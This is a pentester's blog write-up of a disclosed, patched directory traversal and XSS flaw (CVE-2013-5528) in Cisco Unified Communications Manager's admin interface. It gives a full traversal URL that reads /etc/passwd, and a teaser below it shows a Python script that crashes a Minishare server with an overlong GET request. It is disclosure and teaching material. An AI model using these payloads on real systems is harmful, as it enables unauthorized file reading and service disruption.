A short story of LFI and XSS on Cisco Unified Communications Manager Administrative Interface

Cisco Unified Communications Manager Administrative Web Interface Directory Traversal Vulnerability   CVE-2013-5528

{Feels happy when your exploit gets published on exploit-db.com https://www.exploit-db.com/exploits/40887/ }
In one of the pentest engagement I got to play with Cisco Unified Communications Manager Administrative Web Interface 8.x.Well I was able to find LFI and XSS on one of the parameter.
After few months I reported them to Cisco team. Few mail exchanges were done and Cisco team told me that the vulnerability is previously disclosed via CVE 2013-5528.

The team says they have covered LFI and XSS by the same advisory. Any ways, I took the permission to publish the exploit from the team and here I am publishing a writeup.

The vulnerability CVE 2013-5528:

Directory traversal vulnerability exists on Cisco Unified Communications Manager Administrative Web Interface after authentication.
The vulnerability is due to a failure to properly sanitize user-supplied input passed to a specific function. An attacker could exploit this vulnerability by supplying a series of directory traversal characters after authentication, allowing the attacker to designate a file outside the restricted directory to be returned. An exploit could allow the attacker to obtain the contents of any file that is readable by the Apache Tomcat service account.


Affected Versions:
Cisco Unified Call Manager devices running an unpatched version of 7.x, 8.x or 9.x software are affected.


Exploit:


http://abc.com/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
 


The same parameter is vulnerable to XSS as well:


  Fixed version:

Cisco has fixed the vulnerability in 9.1.2, 10.5.2 and 11.5.x.

  References:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20131011-CVE-2013-5528 

https://bst.cloudapps.cisco.com/bugsearch/bug/CSCui78815 

Comments

Post a Comment

Popular posts from this blog

MY OSCP REVIEW

Image
MY OSCP REVIEW About me I am just a guy who has done B.E (Computer Engineering), C.E.H and I am doing vulnerability assessment for different clients in Mumbai. Inspiration to do OSCP Wanted to read technical stuff only then skip this para. Like other guyz I thought that OSCP is one of the most difficult task in the world of IT Security. And yes, it is one the difficult mission you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing, I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and time for completing the task was less. So I asked few question on some group in facebook regarding How can I learn more exploitation stuff. There was a guy with the name Mr.WhiteW0rm who have given me a brilliant answer and recommended me to do OSCP. That time I thought though I won't be able to do OSCP but at least I
Read more

Minishare 1.4.1 Bufferoverflow

Image
You can download the server from: https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0 Exploit code in ruby: https://www.exploit-db.com/exploits/616/ The vulnerability is a long URL in the GET request. Eg:- GET AAAAAAAAAAAAAAAA..... HTTP/1.1 Lab Setup: 1) Windows xp ( I am using windows xp sp1) 2) Immunity debugger installed on the windows xp machine. 3) Minishare 1.4.1 installed on windows xp running on port 80. 2) Kali linux for scripting and exploiting. Configure the victim: I have installed Minishare server 1.4.1 and it is listening for connections on port 80, as depicted below. Generate Sample script to crash: We will try to smash the stack by sending a buffer of 2000 A's with the help of the following script. #!/usr/share/python import socket,sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) buff="GET " buff+="A"*2000 buff+=" HTTP/1.1\r\n\r\n" s.send(buff) s.close
Read more